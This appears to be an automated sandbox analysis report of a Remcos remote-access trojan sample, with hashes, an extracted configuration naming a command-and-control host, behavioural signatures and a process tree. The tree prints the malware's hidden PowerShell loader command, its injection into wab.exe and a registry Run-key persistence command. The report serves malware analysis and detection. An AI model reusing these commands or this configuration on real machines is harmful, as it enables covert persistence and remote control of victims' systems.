Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 10:05
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240704-en
General
-
Target
MalwareBazaar.exe
-
Size
432KB
-
MD5
a35683ad12f004d512b53db7e56c0f1e
-
SHA1
b374ded49f0cbb44d62eacc4559a0599fc8e7693
-
SHA256
f15598708dc31075551274589e74d332be05fdd17c30c61605758aba3a6c7848
-
SHA512
4dcf4304c9e78dbc8d10b651b7b2d05f57afb6a48cb4171e424aad4ec85b088d038a5a74c657d9160e75c9c4ec96cca820c859affde6fadef463e87fb5d2c576
-
SSDEEP
12288:bgoBof8NmB40NiOzwwbbihF1EbdLPrsHTbqDDR6:Cf8NmuizL8uouHc
Malware Config
Extracted
remcos
RemoteHost
newskingdomz.live:22330
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5DIOEW
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2372 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\\Dandyishly\\').Gunnysacks;%Overimportance% ($Fingerboard)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2800 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2372 powershell.exe 2800 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2372 set thread context of 2800 2372 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2896 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2556 wrote to memory of 2372 2556 MalwareBazaar.exe 30 PID 2556 wrote to memory of 2372 2556 MalwareBazaar.exe 30 PID 2556 wrote to memory of 2372 2556 MalwareBazaar.exe 30 PID 2556 wrote to memory of 2372 2556 MalwareBazaar.exe 30 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2372 wrote to memory of 2800 2372 powershell.exe 34 PID 2800 wrote to memory of 2784 2800 wab.exe 35 PID 2800 wrote to memory of 2784 2800 wab.exe 35 PID 2800 wrote to memory of 2784 2800 wab.exe 35 PID 2800 wrote to memory of 2784 2800 wab.exe 35 PID 2784 wrote to memory of 2896 2784 cmd.exe 37 PID 2784 wrote to memory of 2896 2784 cmd.exe 37 PID 2784 wrote to memory of 2896 2784 cmd.exe 37 PID 2784 wrote to memory of 2896 2784 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden " $Debutromanen151=cat 'C:\Users\Admin\AppData\Local\problemlst\capsulogenous\Dicyema.Bra';$Postekspeditioner=$Debutromanen151.substring(50811,3);.$Postekspeditioner($Debutromanen151)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"4⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2896
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
320KB
MD54b061f44cc00f0baf2507082281dc656
SHA1b48a02471a41631c45c0a72572d894fdfa9f822e
SHA256b2f855ba79a403d4fcdf9aeca479230165dae928867773e8e2c01f5eb13b8bfe
SHA512b0aca9c332d49d4219252fc3116bdad0a8597f48e3bb9529e3b83251339fdcb5a537c509a967097e1899c4dae3c6f16046163c40a4a8bc0b9d5e6f45e72acaa6
-
Filesize
77KB
MD5f3046f76eef0b6e7bfa0b2ea4f96dbc4
SHA1c88ba1baf506c20a95f39bdea30b7e9886c84f89
SHA25692be7fec38ebcbd57e75b7ae02e7e8b3d73ccfd0cc3eaea3e1ea72ab60c946e6
SHA51284cce01131e12290db43337b9fc34e3835974014632cbfc39dba4ba1186ca66211d8ddc0e985c0431b4ed0e510b4b7aff6cb19aa5b78373408e7ca4e406b2b74